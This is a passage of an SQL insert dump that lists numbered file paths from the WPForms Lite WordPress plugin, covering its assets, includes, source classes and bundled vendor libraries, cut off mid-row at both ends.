p/screenshot-tnail.png'),(6810,'wp-content/plugins/wpforms-lite/assets/images/smtp/wpforms-wpmailsmtp.png'),(6811,'wp-content/plugins/wpforms-lite/assets/images/smtp/wpforms-wpmailsmtp@2x.png'),(6812,'wp-content/plugins/wpforms-lite/assets/images/step-1.svg'),(6813,'wp-content/plugins/wpforms-lite/assets/images/step-2.svg'),(6814,'wp-content/plugins/wpforms-lite/assets/images/step-3.svg'),(6815,'wp-content/plugins/wpforms-lite/assets/images/step-complete.svg'),(6816,'wp-content/plugins/wpforms-lite/assets/images/submit-spin.svg'),(6817,'wp-content/plugins/wpforms-lite/assets/images/sullie-alt.png'),(6818,'wp-content/plugins/wpforms-lite/assets/images/sullie-builder-mobile.png'),(6819,'wp-content/plugins/wpforms-lite/assets/images/sullie-vc.png'),(6820,'wp-content/plugins/wpforms-lite/assets/images/sullie.png'),(6821,'wp-content/plugins/wpforms-lite/assets/images/times-circle.svg'),(6822,'wp-content/plugins/wpforms-lite/assets/images/times-solid-white.svg'),(6823,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-1.png'),(6824,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-10.png'),(6825,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-2.png'),(6826,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-3.png'),(6827,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-4.png'),(6828,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-5.png'),(6829,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-6.png'),(6830,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-7.png'),(6831,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-8.png'),(6832,'wp-content/plugins/wpforms-lite/assets/images/welcome-feature-icon-9.png'),(6833,'wp-content/plugins/wpforms-lite/assets/images/welcome-testimonial-bill.jpg'),(6834,'wp-content/plugins/wpforms-lite/assets/images/welcome-testimonial-david.jpg'),(6835,'wp-content/plugins/wpforms-lite/assets/images/welcome-video.png'),(6836,'wp-content/plugins/wpforms-lite/assets/images/zoom.svg'),(6837,'wp-content/plugins/wpforms-lite/assets/js/admin-builder-conditional-logic-core.js'),(6838,'wp-content/plugins/wpforms-lite/assets/js/admin-builder-providers.js'),(6839,'wp-content/plugins/wpforms-lite/assets/js/admin-builder.js'),(6840,'wp-content/plugins/wpforms-lite/assets/js/admin-editor.js'),(6841,'wp-content/plugins/wpforms-lite/assets/js/admin-notifications.js'),(6842,'wp-content/plugins/wpforms-lite/assets/js/admin-notifications.min.js'),(6843,'wp-content/plugins/wpforms-lite/assets/js/admin-utils.js'),(6844,'wp-content/plugins/wpforms-lite/assets/js/admin.js'),(6845,'wp-content/plugins/wpforms-lite/assets/js/admin.min.js'),(6846,'wp-content/plugins/wpforms-lite/assets/js/chart.min.js'),(6847,'wp-content/plugins/wpforms-lite/assets/js/choices.min.js'),(6848,'wp-content/plugins/wpforms-lite/assets/js/components/admin/builder/providers.js'),(6849,'wp-content/plugins/wpforms-lite/assets/js/components/admin/builder/providers.min.js'),(6850,'wp-content/plugins/wpforms-lite/assets/js/components/admin/builder/templates.js'),(6851,'wp-content/plugins/wpforms-lite/assets/js/components/admin/builder/templates.min.js'),(6852,'wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-admin.js'),(6853,'wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-admin.min.js'),(6854,'wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-builder.js'),(6855,'wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-builder.min.js'),(6856,'wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-core.js'),(6857,'wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-core.min.js'),(6858,'wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-embed.js'),(6859,'wp-content/plugins/wpforms-lite/assets/js/components/admin/challenge/challenge-embed.min.js'),(6860,'wp-content/plugins/wpforms-lite/assets/js/components/admin/gutenberg/formselector.js'),(6861,'wp-content/plugins/wpforms-lite/assets/js/components/admin/gutenberg/formselector.min.js'),(6862,'wp-content/plugins/wpforms-lite/assets/js/components/admin/pages/analytics.js'),(6863,'wp-content/plugins/wpforms-lite/assets/js/components/admin/pages/analytics.min.js'),(6864,'wp-content/plugins/wpforms-lite/assets/js/components/admin/pages/smtp.js'),(6865,'wp-content/plugins/wpforms-lite/assets/js/components/admin/pages/smtp.min.js'),(6866,'wp-content/plugins/wpforms-lite/assets/js/flatpickr.min.js'),(6867,'wp-content/plugins/wpforms-lite/assets/js/integrations/wpforms-elementor.js'),(6868,'wp-content/plugins/wpforms-lite/assets/js/integrations/wpforms-elementor.min.js'),(6869,'wp-content/plugins/wpforms-lite/assets/js/jquery.conditionals.min.js'),(6870,'wp-content/plugins/wpforms-lite/assets/js/jquery.inputmask.bundle.min.js'),(6871,'wp-content/plugins/wpforms-lite/assets/js/jquery.insert-at-caret.min.js'),(6872,'wp-content/plugins/wpforms-lite/assets/js/jquery.jquery-confirm.min.js'),(6873,'wp-content/plugins/wpforms-lite/assets/js/jquery.matchHeight-min.js'),(6874,'wp-content/plugins/wpforms-lite/assets/js/jquery.minicolors.min.js'),(6875,'wp-content/plugins/wpforms-lite/assets/js/jquery.payment.min.js'),(6876,'wp-content/plugins/wpforms-lite/assets/js/jquery.serialize-object.min.js'),(6877,'wp-content/plugins/wpforms-lite/assets/js/jquery.timepicker.min.js'),(6878,'wp-content/plugins/wpforms-lite/assets/js/jquery.tooltipster.min.js'),(6879,'wp-content/plugins/wpforms-lite/assets/js/jquery.validate.js'),(6880,'wp-content/plugins/wpforms-lite/assets/js/jquery.validate.min.js'),(6881,'wp-content/plugins/wpforms-lite/assets/js/list.min.js'),(6882,'wp-content/plugins/wpforms-lite/assets/js/lity.min.js'),(6883,'wp-content/plugins/wpforms-lite/assets/js/mailcheck.min.js'),(6884,'wp-content/plugins/wpforms-lite/assets/js/moment-with-locales.min.js'),(6885,'wp-content/plugins/wpforms-lite/assets/js/moment.min.js'),(6886,'wp-content/plugins/wpforms-lite/assets/js/purify.min.js'),(6887,'wp-content/plugins/wpforms-lite/assets/js/text-limit.js'),(6888,'wp-content/plugins/wpforms-lite/assets/js/text-limit.min.js'),(6889,'wp-content/plugins/wpforms-lite/assets/js/wpforms-confirmation.js'),(6890,'wp-content/plugins/wpforms-lite/assets/js/wpforms.js'),(6891,'wp-content/plugins/wpforms-lite/changelog.txt'),(6892,'wp-content/plugins/wpforms-lite/includes/admin/admin.php'),(6893,'wp-content/plugins/wpforms-lite/includes/admin/ajax-actions.php'),(6894,'wp-content/plugins/wpforms-lite/includes/admin/builder/class-builder.php'),(6895,'wp-content/plugins/wpforms-lite/includes/admin/builder/functions.php'),(6896,'wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-base.php'),(6897,'wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-fields.php'),(6898,'wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-payments.php'),(6899,'wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-providers.php'),(6900,'wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-settings.php'),(6901,'wp-content/plugins/wpforms-lite/includes/admin/builder/panels/class-setup.php'),(6902,'wp-content/plugins/wpforms-lite/includes/admin/class-about.php'),(6903,'wp-content/plugins/wpforms-lite/includes/admin/class-editor.php'),(6904,'wp-content/plugins/wpforms-lite/includes/admin/class-importers.php'),(6905,'wp-content/plugins/wpforms-lite/includes/admin/class-install-skin.php'),(6906,'wp-content/plugins/wpforms-lite/includes/admin/class-menu.php'),(6907,'wp-content/plugins/wpforms-lite/includes/admin/class-notices.php'),(6908,'wp-content/plugins/wpforms-lite/includes/admin/class-review.php'),(6909,'wp-content/plugins/wpforms-lite/includes/admin/class-settings.php'),(6910,'wp-content/plugins/wpforms-lite/includes/admin/class-tools.php'),(6911,'wp-content/plugins/wpforms-lite/includes/admin/class-welcome.php'),(6912,'wp-content/plugins/wpforms-lite/includes/admin/importers/class-base.php'),(6913,'wp-content/plugins/wpforms-lite/includes/admin/importers/class-contact-form-7.php'),(6914,'wp-content/plugins/wpforms-lite/includes/admin/importers/class-ninja-forms.php'),(6915,'wp-content/plugins/wpforms-lite/includes/admin/importers/class-pirate-forms.php'),(6916,'wp-content/plugins/wpforms-lite/includes/admin/importers/interface.php'),(6917,'wp-content/plugins/wpforms-lite/includes/admin/overview/class-overview-table.php'),(6918,'wp-content/plugins/wpforms-lite/includes/admin/overview/class-overview.php'),(6919,'wp-content/plugins/wpforms-lite/includes/admin/settings-api.php'),(6920,'wp-content/plugins/wpforms-lite/includes/class-conditional-logic-core.php'),(6921,'wp-content/plugins/wpforms-lite/includes/class-db.php'),(6922,'wp-content/plugins/wpforms-lite/includes/class-fields.php'),(6923,'wp-content/plugins/wpforms-lite/includes/class-form.php'),(6924,'wp-content/plugins/wpforms-lite/includes/class-frontend.php'),(6925,'wp-content/plugins/wpforms-lite/includes/class-install.php'),(6926,'wp-content/plugins/wpforms-lite/includes/class-logging.php'),(6927,'wp-content/plugins/wpforms-lite/includes/class-process.php'),(6928,'wp-content/plugins/wpforms-lite/includes/class-providers.php'),(6929,'wp-content/plugins/wpforms-lite/includes/class-smart-tags.php'),(6930,'wp-content/plugins/wpforms-lite/includes/class-templates.php'),(6931,'wp-content/plugins/wpforms-lite/includes/class-widget.php'),(6932,'wp-content/plugins/wpforms-lite/includes/deprecated.php'),(6933,'wp-content/plugins/wpforms-lite/includes/emails/class-emails.php'),(6934,'wp-content/plugins/wpforms-lite/includes/emails/templates/body-default.php'),(6935,'wp-content/plugins/wpforms-lite/includes/emails/templates/default.php'),(6936,'wp-content/plugins/wpforms-lite/includes/emails/templates/field-default.php'),(6937,'wp-content/plugins/wpforms-lite/includes/emails/templates/footer-default.php'),(6938,'wp-content/plugins/wpforms-lite/includes/emails/templates/header-default.php'),(6939,'wp-content/plugins/wpforms-lite/includes/fields/class-base.php'),(6940,'wp-content/plugins/wpforms-lite/includes/fields/class-checkbox.php'),(6941,'wp-content/plugins/wpforms-lite/includes/fields/class-email.php'),(6942,'wp-content/plugins/wpforms-lite/includes/fields/class-gdpr-checkbox.php'),(6943,'wp-content/plugins/wpforms-lite/includes/fields/class-name.php'),(6944,'wp-content/plugins/wpforms-lite/includes/fields/class-number-slider.php'),(6945,'wp-content/plugins/wpforms-lite/includes/fields/class-number.php'),(6946,'wp-content/plugins/wpforms-lite/includes/fields/class-radio.php'),(6947,'wp-content/plugins/wpforms-lite/includes/fields/class-select.php'),(6948,'wp-content/plugins/wpforms-lite/includes/fields/class-text.php'),(6949,'wp-content/plugins/wpforms-lite/includes/fields/class-textarea.php'),(6950,'wp-content/plugins/wpforms-lite/includes/functions-list.php'),(6951,'wp-content/plugins/wpforms-lite/includes/functions.php'),(6952,'wp-content/plugins/wpforms-lite/includes/integrations.php'),(6953,'wp-content/plugins/wpforms-lite/includes/providers/class-base.php'),(6954,'wp-content/plugins/wpforms-lite/includes/providers/class-constant-contact.php'),(6955,'wp-content/plugins/wpforms-lite/includes/templates/class-base.php'),(6956,'wp-content/plugins/wpforms-lite/includes/templates/class-blank.php'),(6957,'wp-content/plugins/wpforms-lite/includes/templates/class-contact.php'),(6958,'wp-content/plugins/wpforms-lite/includes/templates/class-subscribe.php'),(6959,'wp-content/plugins/wpforms-lite/includes/templates/class-suggestion.php'),(6960,'wp-content/plugins/wpforms-lite/languages/wpforms-lite.pot'),(6961,'wp-content/plugins/wpforms-lite/lite/assets/css/admin.css'),(6962,'wp-content/plugins/wpforms-lite/lite/assets/css/admin.min.css'),(6963,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/builder-education.js'),(6964,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/builder-education.min.js'),(6965,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/connect.js'),(6966,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/connect.min.js'),(6967,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/dashboard-widget.js'),(6968,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/dashboard-widget.min.js'),(6969,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/education.js'),(6970,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/education.min.js'),(6971,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/settings-education.js'),(6972,'wp-content/plugins/wpforms-lite/lite/assets/js/admin/settings-education.min.js'),(6973,'wp-content/plugins/wpforms-lite/lite/assets/js/admin-builder-lite.js'),(6974,'wp-content/plugins/wpforms-lite/lite/assets/scss/admin/_education.scss'),(6975,'wp-content/plugins/wpforms-lite/lite/assets/scss/admin/_page-settings-access.scss'),(6976,'wp-content/plugins/wpforms-lite/lite/assets/scss/admin.scss'),(6977,'wp-content/plugins/wpforms-lite/lite/wpforms-lite.php'),(6978,'wp-content/plugins/wpforms-lite/readme.txt'),(6979,'wp-content/plugins/wpforms-lite/src/Access/Capabilities.php'),(6980,'wp-content/plugins/wpforms-lite/src/Admin/AdminBarMenu.php'),(6981,'wp-content/plugins/wpforms-lite/src/Admin/Challenge.php'),(6982,'wp-content/plugins/wpforms-lite/src/Admin/FlyoutMenu.php'),(6983,'wp-content/plugins/wpforms-lite/src/Admin/Loader.php'),(6984,'wp-content/plugins/wpforms-lite/src/Admin/Notifications.php'),(6985,'wp-content/plugins/wpforms-lite/src/Admin/Pages/Analytics.php'),(6986,'wp-content/plugins/wpforms-lite/src/Admin/Pages/Community.php'),(6987,'wp-content/plugins/wpforms-lite/src/Admin/Pages/SMTP.php'),(6988,'wp-content/plugins/wpforms-lite/src/Emails/InfoBlocks.php'),(6989,'wp-content/plugins/wpforms-lite/src/Emails/Mailer.php'),(6990,'wp-content/plugins/wpforms-lite/src/Emails/Styler.php'),(6991,'wp-content/plugins/wpforms-lite/src/Emails/Summaries.php'),(6992,'wp-content/plugins/wpforms-lite/src/Emails/Templates/General.php'),(6993,'wp-content/plugins/wpforms-lite/src/Emails/Templates/Summary.php'),(6994,'wp-content/plugins/wpforms-lite/src/Forms/Loader.php'),(6995,'wp-content/plugins/wpforms-lite/src/Forms/Preview.php'),(6996,'wp-content/plugins/wpforms-lite/src/Helpers/Chain.php'),(6997,'wp-content/plugins/wpforms-lite/src/Helpers/PluginSilentUpgrader.php'),(6998,'wp-content/plugins/wpforms-lite/src/Helpers/PluginSilentUpgraderSkin.php'),(6999,'wp-content/plugins/wpforms-lite/src/Helpers/Templates.php'),(7000,'wp-content/plugins/wpforms-lite/src/Integrations/Elementor/Elementor.php'),(7001,'wp-content/plugins/wpforms-lite/src/Integrations/Gutenberg/FormSelector.php'),(7002,'wp-content/plugins/wpforms-lite/src/Integrations/IntegrationInterface.php'),(7003,'wp-content/plugins/wpforms-lite/src/Integrations/Loader.php'),(7004,'wp-content/plugins/wpforms-lite/src/Integrations/SiteHealth/SiteHealth.php'),(7005,'wp-content/plugins/wpforms-lite/src/Integrations/WPMailSMTP/Notifications.php'),(7006,'wp-content/plugins/wpforms-lite/src/Lite/Admin/Builder/Education.php'),(7007,'wp-content/plugins/wpforms-lite/src/Lite/Admin/Connect.php'),(7008,'wp-content/plugins/wpforms-lite/src/Lite/Admin/ConnectSkin.php'),(7009,'wp-content/plugins/wpforms-lite/src/Lite/Admin/DashboardWidget.php'),(7010,'wp-content/plugins/wpforms-lite/src/Lite/Admin/Education.php'),(7011,'wp-content/plugins/wpforms-lite/src/Lite/Admin/Settings/Access.php'),(7012,'wp-content/plugins/wpforms-lite/src/Lite/Admin/Settings/Education.php'),(7013,'wp-content/plugins/wpforms-lite/src/Lite/Reports/EntriesCount.php'),(7014,'wp-content/plugins/wpforms-lite/src/Loader.php'),(7015,'wp-content/plugins/wpforms-lite/src/Migrations.php'),(7016,'wp-content/plugins/wpforms-lite/src/Providers/Loader.php'),(7017,'wp-content/plugins/wpforms-lite/src/Providers/Provider/Core.php'),(7018,'wp-content/plugins/wpforms-lite/src/Providers/Provider/Process.php'),(7019,'wp-content/plugins/wpforms-lite/src/Providers/Provider/Settings/FormBuilder.php'),(7020,'wp-content/plugins/wpforms-lite/src/Providers/Provider/Settings/FormBuilderInterface.php'),(7021,'wp-content/plugins/wpforms-lite/src/Providers/Provider/Settings/PageIntegrations.php'),(7022,'wp-content/plugins/wpforms-lite/src/Providers/Provider/Settings/PageIntegrationsInterface.php'),(7023,'wp-content/plugins/wpforms-lite/src/Providers/Provider/Status.php'),(7024,'wp-content/plugins/wpforms-lite/src/Tasks/Actions/EntryEmailsMetaCleanupTask.php'),(7025,'wp-content/plugins/wpforms-lite/src/Tasks/Actions/EntryEmailsTask.php'),(7026,'wp-content/plugins/wpforms-lite/src/Tasks/Meta.php'),(7027,'wp-content/plugins/wpforms-lite/src/Tasks/Task.php'),(7028,'wp-content/plugins/wpforms-lite/src/Tasks/Tasks.php'),(7029,'wp-content/plugins/wpforms-lite/src/WPForms.php'),(7030,'wp-content/plugins/wpforms-lite/templates/emails/general-body-plain.php'),(7031,'wp-content/plugins/wpforms-lite/templates/emails/general-body.php'),(7032,'wp-content/plugins/wpforms-lite/templates/emails/general-footer.php'),(7033,'wp-content/plugins/wpforms-lite/templates/emails/general-header.php'),(7034,'wp-content/plugins/wpforms-lite/templates/emails/general-queries.php'),(7035,'wp-content/plugins/wpforms-lite/templates/emails/general-style.php'),(7036,'wp-content/plugins/wpforms-lite/templates/emails/summary-body-plain.php'),(7037,'wp-content/plugins/wpforms-lite/templates/emails/summary-body.php'),(7038,'wp-content/plugins/wpforms-lite/templates/emails/summary-style.php'),(7039,'wp-content/plugins/wpforms-lite/templates/fields/number-slider/builder-option-min-max.php'),(7040,'wp-content/plugins/wpforms-lite/templates/fields/number-slider/builder-preview.php'),(7041,'wp-content/plugins/wpforms-lite/templates/fields/number-slider/frontend.php'),(7042,'wp-content/plugins/wpforms-lite/uninstall.php'),(7043,'wp-content/plugins/wpforms-lite/vendor/autoload.php'),(7044,'wp-content/plugins/wpforms-lite/vendor/composer/ClassLoader.php'),(7045,'wp-content/plugins/wpforms-lite/vendor/composer/LICENSE'),(7046,'wp-content/plugins/wpforms-lite/vendor/composer/autoload_classmap.php'),(7047,'wp-content/plugins/wpforms-lite/vendor/composer/autoload_files.php'),(7048,'wp-content/plugins/wpforms-lite/vendor/composer/autoload_namespaces.php'),(7049,'wp-content/plugins/wpforms-lite/vendor/composer/autoload_psr4.php'),(7050,'wp-content/plugins/wpforms-lite/vendor/composer/autoload_real.php'),(7051,'wp-content/plugins/wpforms-lite/vendor/composer/autoload_static.php'),(7052,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/LICENSE'),(7053,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/phpunit-bootstrap.php'),(7054,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Export/Protocol/Exception/IOException.php'),(7055,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Export/Protocol/ExporterInterface.php'),(7056,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Export/Standard/Collection/CallbackCollection.php'),(7057,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Export/Standard/Collection/PdoCollection.php'),(7058,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Export/Standard/CsvFileObject.php'),(7059,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Export/Standard/Exception/StrictViolationException.php'),(7060,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Export/Standard/Exporter.php'),(7061,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Export/Standard/ExporterConfig.php'),(7062,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Protocol/Exception/CsvFileNotFoundException.php'),(7063,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Protocol/Exception/InvalidLexicalException.php'),(7064,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Protocol/InterpreterInterface.php'),(7065,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Protocol/LexerInterface.php'),(7066,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Standard/Exception/StrictViolationException.php'),(7067,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Standard/Interpreter.php'),(7068,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Standard/Lexer.php'),(7069,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Standard/LexerConfig.php'),(7070,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Standard/Observer/PdoObserver.php'),(7071,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Standard/Observer/SqlObserver.php'),(7072,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/Import/Standard/StreamFilter/ConvertMbstringEncoding.php'),(7073,'wp-content/plugins/wpforms-lite/vendor/goodby/csv/src/Goodby/CSV/TestHelper/DbManager.php'),(7074,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/CssSelector.php'),(7075,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/CssSelectorConverter.php'),(7076,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Exception/ExceptionInterface.php'),(7077,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Exception/ExpressionErrorException.php'),(7078,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Exception/InternalErrorException.php'),(7079,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Exception/ParseException.php'),(7080,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Exception/SyntaxErrorException.php'),(7081,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/LICENSE'),(7082,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/AbstractNode.php'),(7083,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/AttributeNode.php'),(7084,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/ClassNode.php'),(7085,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/CombinedSelectorNode.php'),(7086,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/ElementNode.php'),(7087,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/FunctionNode.php'),(7088,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/HashNode.php'),(7089,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/NegationNode.php'),(7090,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/NodeInterface.php'),(7091,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/PseudoNode.php'),(7092,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/SelectorNode.php'),(7093,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/Specificity.php'),(7094,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Handler/CommentHandler.php'),(7095,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Handler/HandlerInterface.php'),(7096,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Handler/HashHandler.php'),(7097,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Handler/IdentifierHandler.php'),(7098,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Handler/NumberHandler.php'),(7099,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Handler/StringHandler.php'),(7100,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Handler/WhitespaceHandler.php'),(7101,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Parser.php'),(7102,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/ParserInterface.php'),(7103,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Reader.php'),(7104,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Shortcut/ClassParser.php'),(7105,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Shortcut/ElementParser.php'),(7106,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Shortcut/EmptyStringParser.php'),(7107,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Shortcut/HashParser.php'),(7108,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Token.php'),(7109,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/TokenStream.php'),(7110,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Tokenizer/Tokenizer.php'),(7111,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Tokenizer/TokenizerEscaping.php'),(7112,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Parser/Tokenizer/TokenizerPatterns.php'),(7113,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Extension/AbstractExtension.php'),(7114,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Extension/AttributeMatchingExtension.php'),(7115,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Extension/CombinationExtension.php'),(7116,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Extension/ExtensionInterface.php'),(7117,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Extension/FunctionExtension.php'),(7118,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Extension/HtmlExtension.php'),(7119,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Extension/NodeExtension.php'),(7120,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Extension/PseudoClassExtension.php'),(7121,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/Translator.php'),(7122,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/TranslatorInterface.php'),(7123,'wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/XPath/XPathExpr.php'),(7124,'wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-mbstring/LICENSE'),(7125,'wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-mbstring/Mbstring.php'),(7126,'wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-mbstring/Resources/unidata/lowerCase.php'),(7127,'wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-mbstring/Resources/unidata/titleCaseRegexp.php'),(7128,'wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-mbstring/Resources/unidata/upperCase.php'),(7129,'wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-mbstring/bootstrap.php'),(7130,'wp-content/plugins/wpforms-lite/vendor/tijsverkoyen/css-to-inline-styles/LICENSE.md'),(7131,'wp-content/plugins/wpforms-lite/vendor/tijsverkoyen/css-to-inline-styles/src/Css/Processor.php'),(7132,'wp-content/plugins/wpforms-lite/vendor/tijsverkoyen/css-to-inline-styles/src/Css/Property/Processor.php'),(7133,'wp-content/plugins/wpforms-lite/vendor/tijsverkoyen/css-to-inline-styles/src/Css/Property/Property.php'),(7134,'wp-content/plugins/wpforms-lite/vendor/tijsverkoyen/css-to-inline-styles/src/Css/Rule/Processor.php'),(7135,'wp-content/plugins/wpforms-lite/vendor/tijsverkoyen/css-to-inline-styles/src/Css/Rule/Rule.php'),(7136,'wp-content/plugins/wpforms-lite/vendor/tijsverkoyen/css-to-inline-styles/src/CssToInlineStyles.php'),(7137,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/action-scheduler.php'),(7138,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_ActionClaim.php'),(7139,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_ActionFactory.php'),(7140,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_AdminView.php'),(7141,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_AsyncRequest_QueueRunner.php'),(7142,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_Compatibility.php'),(7143,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_DataController.php'),(7144,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_DateTime.php'),(7145,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_Exception.php'),(7146,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_FatalErrorMonitor.php'),(7147,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_InvalidActionException.php'),(7148,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_ListTable.php'),(7149,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_LogEntry.php'),(7150,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_NullLogEntry.php'),(7151,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/ActionScheduler_OptionLock.php'),(7152,'wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/